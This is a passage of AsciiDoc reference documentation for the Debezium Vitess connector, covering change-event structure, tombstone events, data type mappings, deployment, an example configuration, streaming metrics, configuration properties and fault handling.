\"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-47\\\"}]\"\n        },\n        \"op\": \"d\", \/\/ <4>\n        \"ts_ms\": 1465581902461 \/\/ <5>\n    }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n|Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `vgtid` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. 
By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row.\n\nVitess connector events are designed to work with link:{link-kafka-docs}#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[[vitess-tombstone-events]]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, the Vitess connector follows a _delete_ event with a special _tombstone_ event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-vitess-connectors-map-data-types\n\/\/ Title: How {prodname} Vitess connectors map data types\n[[vitess-data-types]]\n== Data type mappings\n\nThe Vitess connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Vitess data type of the column. This section describes these mappings.\n\n[id=\"vitess-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps basic Vitess data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is literally represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n.Mappings for Vitess basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Vitess data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BOOLEAN, BOOL`\n|`INT16`\na|_n\/a_\n\n|`BIT(1)`\n|Not supported yet\na|_n\/a_\n\n|`BIT(>1)`\n|Not supported yet\na|_n\/a_\n\n|`TINYINT`\n|`INT16`\na|_n\/a_\n\n|`SMALLINT[(M)]`\n|`INT16`\na|_n\/a_\n\n|`MEDIUMINT[(M)]`\n|`INT32`\na|_n\/a_\n\n|`INT, INTEGER[(M)]`\n|`INT32`\na|_n\/a_\n\n|`BIGINT[(M)]`\n|`INT64`\na|_n\/a_\n\n|`REAL[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`FLOAT[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`DOUBLE[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`CHAR[(M)]`\n|`STRING`\na|_n\/a_\n\n|`VARCHAR[(M)]`\n|`STRING`\na|_n\/a_\n\n|`BINARY[(M)]`\n|`BYTES`\na|_n\/a_\n\n|`VARBINARY[(M)]`\n|`BYTES`\na|_n\/a_\n\n|`TINYBLOB`\n|`BYTES`\na|_n\/a_\n\n|`TINYTEXT`\n|`STRING`\na|_n\/a_\n\n|`BLOB`\n|`BYTES`\na|_n\/a_\n\n|`TEXT`\n|`STRING`\na|_n\/a_\n\n|`MEDIUMBLOB`\n|`BYTES`\na|_n\/a_\n\n|`MEDIUMTEXT`\n|`STRING`\na|_n\/a_\n\n|`LONGBLOB`\n|`BYTES`\na|_n\/a_\n\n|`LONGTEXT`\n|`STRING`\na|_n\/a_\n\n|`JSON`\n|`STRING`\na|`io.debezium.data.Json` +\nContains the string representation of a `JSON` document, array, or scalar.\n\n|`ENUM`\n|`STRING`\na|`io.debezium.data.Enum` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`SET`\n|`STRING`\na|`io.debezium.data.EnumSet` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`YEAR[(2\\|4)]`\n|`STRING`\n|_n\/a_\n\n|`TIMESTAMP[(M)]`\n|`STRING`\na|_n\/a_ +\nIn `yyyy-MM-dd HH:mm:ss.SSS` format with microsecond precision based on UTC. MySQL allows `M` to be in the range of `0-6`.\n\n|`DATETIME[(M)]`\n|`STRING`\na|_n\/a_ +\nIn `yyyy-MM-dd HH:mm:ss.SSS` format with microsecond precision. MySQL allows `M` to be in the range of `0-6`.\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`GEOMETRY, +\nLINESTRING, +\nPOLYGON, +\nMULTIPOINT, +\nMULTILINESTRING, +\nMULTIPOLYGON, +\nGEOMETRYCOLLECTION`\n|Not supported yet\na|_n\/a_\n\n|===\n\n
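For example, because `DECIMAL` and `DATETIME` values are emitted as strings, the `after` block for a row that contains a `DECIMAL(13,4)` price column and a `DATETIME` column might look like the following sketch (the table and its values are hypothetical):\n\n[source,json]\n----\n{\n  \"after\": {\n    \"id\": 1001,\n    \"price\": \"12.3400\",\n    \"created_at\": \"2021-05-01 10:15:30.000\"\n  }\n}\n----\n\n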
\/\/ Type: assembly\n\/\/ ModuleID: setting-up-vitess-to-run-a-debezium-connector\n\/\/ Title: Setting up Vitess to run a {prodname} connector\n[[setting-up-vitess]]\n== Setting up Vitess\n\n{prodname} does not require any specific configuration for use with Vitess. Install Vitess according to the standard instructions in the link:https:\/\/vitess.io\/docs\/get-started\/local-docker\/[Local Install via Docker] guide, or the link:https:\/\/vitess.io\/docs\/get-started\/operator\/[Vitess Operator for Kubernetes] guide.\n\n.Checklist\n\n* Make sure that the VTGate host and its gRPC port (default is 15991) are accessible from the machine where the Vitess connector is installed\n* Make sure that the VTCtld host and its gRPC port (default is 15999) are accessible from the machine where the Vitess connector is installed\n\n\/\/ Type: procedure\n\/\/ ModuleID: grpc-authentication\n\/\/ Title: gRPC authentication for a {prodname} connector\n[[grpc-authentication]]\n=== gRPC authentication\n\nBecause the Vitess connector reads change events from the VTGate VStream gRPC server, it does not need to connect directly to MySQL instances. Therefore, no special database user or permissions are needed. At the moment, the Vitess connector supports only unauthenticated access to the VTGate gRPC server.\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-and-managing-debezium-vitess-connectors\n\/\/ Title: Deploying and managing {prodname} Vitess connectors\n[[vitess-deploying-a-connector]]\n== Deployment\n\nWith link:https:\/\/zookeeper.apache.org[Zookeeper], link:http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Vitess connector are to download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-vitess\/{debezium-version}\/debezium-connector-vitess-{debezium-version}-plugin.tar.gz[connector's plug-in archive], extract the JAR files into your Kafka Connect environment, and add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`]. You then need to restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka and Kafka Connect with the Vitess connector already installed and ready to run. 
You can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\n\n\/\/ Type: concept\n\/\/ ModuleID:debezium-vitess-connector-configuration-example\n\/\/ Title: {prodname} Vitess connector configuration example\n[[vitess-example-configuration]]\n=== Connector configuration example\n\nFollowing is an example of the configuration for a Vitess connector that connects to a Vitess (VTGate's VStream) server on port 15991 at 192.168.99.100, whose logical name is `fulfillment`. It also connects to a VTCtld server on port 15999 at 192.168.99.101 to get the initial VGTID. Typically, you configure the {prodname} Vitess connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n  \"name\": \"inventory-connector\", \/\/ <1>\n  \"config\": {\n    \"connector.class\": \"io.debezium.connector.vitess.VitessConnector\", \/\/ <2>\n    \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n    \"database.port\": \"15991\", \/\/ <4>\n    \"database.user\": \"vitess\", \/\/ <5>\n    \"database.password\": \"vitess_password\", \/\/ <6>\n    \"vitess.keyspace\": \"commerce\", \/\/ <7>\n    \"vitess.tablet.type\": \"MASTER\", \/\/ <8>\n    \"vitess.vtctld.host\": \"192.168.99.101\", \/\/ <9>\n    \"vitess.vtctld.port\": \"15999\", \/\/ <10>\n    \"vitess.vtctld.user\": \"vitess\", \/\/ <11>\n    \"vitess.vtctld.password\": \"vitess_password\", \/\/ <12>\n    \"database.server.name\": \"fulfillment\", \/\/ <13>\n    \"tasks.max\": 1 \/\/ <14>\n  }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this Vitess connector class.\n<3> The address of the Vitess (VTGate's VStream) server.\n<4> The port number of the Vitess (VTGate's VStream) server.\n<5> The username of the Vitess database server (VTGate gRPC).\n<6> The password of the Vitess database server (VTGate gRPC).\n<7> The name of the keyspace (a.k.a database). Because no shard is specified, it reads change events from all shards in the keyspace.\n<8> The type of MySQL instance (MASTER or REPLICA) to read change events from.\n<9> The address of the VTCtld server.\n<10> The port of the VTCtld server.\n<11> The username of the VTCtld server (VTCtld gRPC).\n<12> The password of the VTCtld database server (VTCtld gRPC).\n<13> The logical name of the Vitess cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<14> Only one task should operate at any one time.\n\nSee the xref:vitess-connector-properties[complete list of Vitess connector properties] that can be specified in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts the connector task that connects to the Vitess database and streams change event records to Kafka topics.\n\n
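For example, after you register the connector, you can verify that it is running by sending a `GET` request to the Kafka Connect REST API's `\/connectors\/inventory-connector\/status` endpoint. The response might look like the following sketch (the worker address is illustrative):\n\n[source,json]\n----\n{\n  \"name\": \"inventory-connector\",\n  \"connector\": {\n    \"state\": \"RUNNING\",\n    \"worker_id\": \"10.0.0.5:8083\"\n  },\n  \"tasks\": [\n    {\n      \"id\": 0,\n      \"state\": \"RUNNING\",\n      \"worker_id\": \"10.0.0.5:8083\"\n    }\n  ],\n  \"type\": \"source\"\n}\n----\n\n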
\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-vitess-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} Vitess connector configuration to Kafka Connect\n[[vitess-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a Vitess connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* The VTGate host and its gRPC port (default is 15991) are accessible from the machine where the Vitess connector is installed\n\n* The VTCtld host and its gRPC port (default is 15999) are accessible from the machine where the Vitess connector is installed\n\n* The Vitess connector is installed.\n\n.Procedure\n\n. Create a configuration for the Vitess connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\n.Results\n\nWhen the connector starts, it starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-vitess-connector-performance\n\/\/ Title: Monitoring {prodname} Vitess connector performance\n[[vitess-monitoring]]\n=== Monitoring\n\nThe {prodname} Vitess connector provides only one type of metrics, in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* xref:vitess-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\nxref:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-vitess-connector-record-streaming\n\/\/ Title: Monitoring {prodname} Vitess connector record streaming\n[[vitess-streaming-metrics]]\n==== Streaming metrics\n\nThe *MBean* is `debezium.vitess:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\n[cols=\"45%a,25%a,30%a\",options=\"header\"]\n|===\n|Attributes |Type |Description\n\n|[[connectors-strm-metric-millisecondssincelastevent]]<<connectors-strm-metric-millisecondssincelastevent, `+MilliSecondsSinceLastEvent+`>>\n|`long`\n|The number of milliseconds since the connector has read and processed the most recent event.\n\n|[[connectors-strm-metric-totalnumberofeventsseen]]<<connectors-strm-metric-totalnumberofeventsseen, `+TotalNumberOfEventsSeen+`>>\n|`long`\n|The total number of events that this connector has seen since last started or reset.\n\n|[[connectors-strm-metric-numberofeventsfiltered]]<<connectors-strm-metric-numberofeventsfiltered, `+NumberOfEventsFiltered+`>>\n|`long`\n|The number of events that have been filtered by include\/exclude list filtering rules configured on the connector.\n\n|[[connectors-strm-metric-queuetotalcapacity]]<<connectors-strm-metric-queuetotalcapacity, `+QueueTotalCapacity+`>>\n|`int`\n|The length of the queue used to pass events between the streamer and the main Kafka Connect loop.\n\n|[[connectors-strm-metric-queueremainingcapacity]]<<connectors-strm-metric-queueremainingcapacity, `+QueueRemainingCapacity+`>>\n|`int`\n|The free capacity of the queue used to pass events between the streamer and the main Kafka Connect 
loop.\n\n|[[connectors-strm-metric-connected]]<<connectors-strm-metric-connected, `+Connected+`>>\n|`boolean`\n|Flag that denotes whether the connector is currently connected to the database server.\n\n|[[connectors-strm-metric-millisecondsbehindsource]]<<connectors-strm-metric-millisecondsbehindsource, `+MilliSecondsBehindSource+`>>\n|`long`\n|The number of milliseconds between the last change event's timestamp and the connector processing it.\nThe values will incorporate any differences between the clocks on the machines where the database server and the connector are running.\n\n|[[connectors-strm-metric-numberofcommittedtransactions]]<<connectors-strm-metric-numberofcommittedtransactions, `+NumberOfCommittedTransactions+`>>\n|`long`\n|The number of processed transactions that were committed.\n\n|[[connectors-strm-metric-maxqueuesizeinbytes]]<<connectors-strm-metric-maxqueuesizeinbytes, `+MaxQueueSizeInBytes+`>>\n|`long`\n|The maximum buffer of the queue in bytes used to pass events between the streamer and the main Kafka Connect loop.\n\n|[[connectors-strm-metric-currentqueuesizeinbytes]]<<connectors-strm-metric-currentqueuesizeinbytes, `+CurrentQueueSizeInBytes+`>>\n|`long`\n|The current buffer of the queue in bytes used to pass events between the streamer and the main Kafka Connect loop.\n\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-vitess-connector-configuration-properties\n\/\/ Title: Description of {prodname} Vitess connector configuration properties\n[[vitess-connector-properties]]\n=== Connector configuration properties\n\nThe {prodname} Vitess connector has many configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:vitess-required-configuration-properties[Required configuration properties]\n* xref:vitess-advanced-configuration-properties[Advanced configuration properties]\n* xref:vitess-pass-through-properties[Pass-through configuration properties]\n\n[id=\"vitess-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[vitess-property-name]]<<vitess-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[vitess-property-connector-class]]<<vitess-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.vitess.VitessConnector` for the Vitess connector.\n\n|[[vitess-property-tasks-max]]<<vitess-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. 
The Vitess connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[vitess-property-database-hostname]]<<vitess-property-database-hostname, `+database.hostname+`>>\n|\n|IP address or hostname of the Vitess database server (VTGate).\n\n|[[vitess-property-database-port]]<<vitess-property-database-port, `+database.port+`>>\n|`15991`\n|Integer port number of the Vitess database server (VTGate).\n\n|[[vitess-property-keyspace]]<<vitess-property-keyspace, `+vitess.keyspace+`>>\n|\n|The name of the keyspace from which to stream the changes.\n\n|[[vitess-property-shard]]<<vitess-property-shard, `+vitess.shard+`>>\n|_n\/a_\n|An optional name of the shard from which to stream the changes. If not configured, in the case of an unsharded keyspace, the connector streams changes from the only shard; in the case of a sharded keyspace, the connector streams changes from all shards in the keyspace. We recommend not configuring it, so that the connector streams from all shards in the keyspace, because this provides better support for reshard operations. If configured, for example, `-80`, the connector will stream changes from the `-80` shard.\n\n|[[vitess-property-gtid]]<<vitess-property-gtid, `+vitess.gtid+`>>\n|`current`\n|An optional GTID position for a shard to stream from. This has to be set together with `vitess.shard`. If not configured, the connector streams changes from the latest position for the given shard.\n\n|[[vitess-property-stop-on-reshard]]<<vitess-property-stop-on-reshard, `+vitess.stop_on_reshard+`>>\n|`false`\n|Controls the Vitess flag `stop_on_reshard`. +\n +\n`true` - the stream will be stopped after a reshard operation. +\n +\n`false` - the stream will be automatically migrated to the new shards after a reshard operation. +\n +\nIf set to `true`, you should also consider setting `vitess.gtid` in the configuration.\n\n|[[vitess-property-database-user]]<<vitess-property-database-user, `+vitess.database.user+`>>\n|_n\/a_\n|An optional username of the Vitess database server (VTGate). If not configured, unauthenticated VTGate gRPC is used.\n\n|[[vitess-property-database-password]]<<vitess-property-database-password, `+vitess.database.password+`>>\n|_n\/a_\n|An optional password of the Vitess database server (VTGate). 
If not configured, unauthenticated VTGate gRPC is used.\n\n|[[vitess-property-tablet-type]]<<vitess-property-tablet-type, `+vitess.tablet.type+`>>\n|`MASTER`\n|The type of Tablet (hence MySQL) from which to stream the changes: +\n +\n`MASTER` represents streaming from the master MySQL instance +\n +\n`REPLICA` represents streaming from the replica slave MySQL instance +\n +\n`RDONLY` represents streaming from the read-only slave MySQL instance.\n\n|[[vitess-property-database-server-name]]<<vitess-property-database-server-name, `+database.server.name+`>>\n|\n|Logical name that identifies and provides a namespace for the particular Vitess database server or cluster in which {prodname} is capturing changes.\nOnly alphanumeric characters, hyphens, dots and underscores must be used in the database server logical name.\nThe logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n+\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\n====\n\n|[[vitess-property-table-include-list]]<<vitess-property-table-include-list, `+table.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want to capture. Any table not included in `table.include.list` does not have its changes captured. Each identifier is of the form _keyspace_._tableName_. By default, the connector captures changes in every non-system table in each schema whose changes are being captured. Do not also set the `table.exclude.list` property.\n\n|[[vitess-property-table-exclude.list]]<<vitess-property-table-exclude.list, `+table.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you *do not* want to capture. Any table not included in `table.exclude.list` has its changes captured. Each identifier is of the form _keyspace_._tableName_. Do not also set the `table.include.list` property.\n\n|[[vitess-property-column-include-list]]<<vitess-property-column-include-list, `+column.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in change event record values. Fully-qualified names for columns are of the form _keyspace_._tableName_._columnName_. Do not also set the `column.exclude.list` property.\n\n|[[vitess-property-column-exclude-list]]<<vitess-property-column-exclude-list, `+column.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event record values. Fully-qualified names for columns are of the form _keyspace_._tableName_._columnName_. Do not also set the `column.include.list` property.\n\n|[[vitess-property-tombstones-on-delete]]<<vitess-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. 
+\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row in case {link-kafka-docs}\/#compaction[log compaction] is enabled for the topic.\n\n|[[vitess-property-message-key-columns]]<<vitess-property-message-key-columns, `+message.key.columns+`>>\n|_empty string_\n|A semicolon-separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_keyspace-name_._table-name_:_regexp_;... +\n +\nFor example, +\n +\n`keyspaceA.table_a:regex_1;keyspaceA.table_b:regex_2;keyspaceA.table_c:regex_3` +\n +\nIf `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n|===\n\n[id=\"vitess-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,28%a,42%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[vitess-property-event-processing-failure-handling-mode]]<<vitess-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n| Specifies how the connector should react to exceptions during processing of events: +\n +\n`fail` propagates the exception, indicates the offset of the problematic event, and causes the connector to stop. +\n +\n`warn` logs the offset of the problematic event, skips that event, and continues processing. 
+\n +\n`skip` skips the problematic event and continues processing.\n\n|[[vitess-property-max-queue-size]]<<vitess-property-max-queue-size, `+max.queue.size+`>>\n|`20240`\n|Positive integer value that specifies the maximum number of records that the blocking queue can hold.\nWhen {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.\nThe blocking queue can provide backpressure for reading change events from the database\nin cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.\nEvents that are held in the queue are disregarded when the connector periodically records offsets.\nAlways set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size`].\n\n|[[vitess-property-max-batch-size]]<<vitess-property-max-batch-size, `+max.batch.size+`>>\n|`10240`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[vitess-property-max-queue-size-in-bytes]]<<vitess-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|A long integer value that specifies the maximum volume of the blocking queue in bytes.\nBy default, volume limits are not specified for the blocking queue.\nTo specify the number of bytes that the queue can consume, set this property to a positive long value. +\nIf xref:vitess-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.\nFor example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.\n\n|[[vitess-property-poll-interval-ms]]<<vitess-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[vitess-property-sanitize-field-names]]<<vitess-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter. +\n`false` if not.\n|Indicates whether field names are sanitized to adhere to xref:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[vitess-property-skipped-operations]]<<vitess-property-skipped-operations, `+skipped.operations+`>>\n|\n|A comma-separated list of operation types that will be skipped during streaming.\nThe operations include: `c` for inserts\/create, `u` for updates, and `d` for deletes.\nBy default, no operations are skipped.\n\n|[[vitess-property-provide-transaction-metadata]]<<vitess-property-provide-transaction-metadata, `provide.transaction.metadata`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See xref:vitess-transaction-metadata[Transaction metadata] for details.\n\n|[[vitess-property-transaction-topic]]<<vitess-property-transaction-topic, `transaction.topic`>>\n|`${database.server.name}.transaction`\n|Controls the name of the topic to which the connector sends transaction metadata messages. 
The placeholder `${database.server.name}` can be used for referring to the connector's logical name; defaults to `${database.server.name}.transaction`, for example `dbserver1.transaction`.\n\n|[[vitess-property-keepalive-interval-ms]]<<vitess-property-keepalive-interval-ms, `+vitess.keepalive.interval.ms+`>>\n|`Long.MAX_VALUE`\n|Controls the interval between periodic gRPC keepalive pings for VStream. Defaults to `Long.MAX_VALUE` (disabled).\n\n|[[vitess-property-grpc-headers]]<<vitess-property-grpc-headers, `+vitess.grpc.headers+`>>\n|\n|Specify a comma-separated list of gRPC headers. Defaults to empty. The format is: +\n +\n_key1:value1,key2:value2_,... +\n +\nFor example, +\n +\n`x-envoy-upstream-rq-timeout-ms:0,x-envoy-max-retries:2`\n\n|[[vitess-property-grpc-max-inbound-message-size]]<<vitess-property-grpc-max-inbound-message-size, `+vitess.grpc.max_inbound_message_size+`>>\n|\n|Specify the maximum message size in bytes allowed to be received on the channel. +\n +\nThe default is 4 MiB.\n\n|[[vitess-property-column-propagate-source-type]]<<vitess-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. This schema parameter:\n\n`pass:[_]pass:[_]debezium.source.column.type`\n\nis used to propagate the original type name for variable-width types. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of the following form:\n\n_keyspaceName_._tableName_._columnName_\n\n|[[vitess-property-datatype-propagate-source-type]]<<vitess-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the database-specific data type name of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. This schema parameter:\n\n`pass:[_]pass:[_]debezium.source.column.type`\n\nis used to propagate the original type name for variable-width types. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of the following form:\n\n_keyspaceName_._tableName_._columnName_\n\nSee xref:vitess-data-types[how Vitess connectors map data types] for the list of Vitess-specific data type names.\n\n\n|===\n\n[id=\"vitess-pass-through-properties\"]\n.Pass-through connector configuration properties\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer.\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. The Vitess connector does use the {link-kafka-docs}.html#consumerconfigs[new consumer configuration properties].\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-vitess-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} Vitess connectors handle faults and problems\n[[vitess-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. 
When the system is operating normally or being managed carefully, {prodname} provides _exactly once_ delivery of every change event record.\n\nIf a fault does happen, the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\n\n[id=\"vitess-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error\/exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to Vitess by using the specified connection parameters.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. After you correct the configuration or address the Vitess problem, restart the connector.\n\n[id=\"vitess-becomes-unavailable\"]\n=== Vitess becomes unavailable\n\nWhen the connector is running, the Vitess server (VTGate) that it is connected to could become unavailable for any number of reasons. If this happens, the connector fails with an error and stops. When the server is available again, restart the connector.\n\nThe Vitess connector externally stores the last processed offset in the form of a Vitess VGTID. After a connector restarts and connects to a server instance, the connector communicates with the server to continue streaming from that particular offset.\n\n[id=\"invalid-column-name-error\"]\n=== Invalid column name error\n\nThis error happens very rarely. If you receive an error with the message `Illegal prefix '@' for column: x, from schema: y, table: z`, and your table doesn't have such a column, it is a Vitess vstream link:https:\/\/vitess.slack.com\/archives\/C0PQY0PTK\/p1606817216038500[bug] that is caused by column renaming or a column type change. It is a transient error. You can restart the connector after a short backoff, and the issue should resolve automatically.\n\n[id=\"vitess-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nSuppose that Kafka Connect is being run in distributed mode and a Kafka Connect process is stopped gracefully. Prior to shutting down that process, Kafka Connect migrates the process's connector tasks to another Kafka Connect process in that group. The new connector tasks start processing exactly where the prior tasks stopped. There is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new 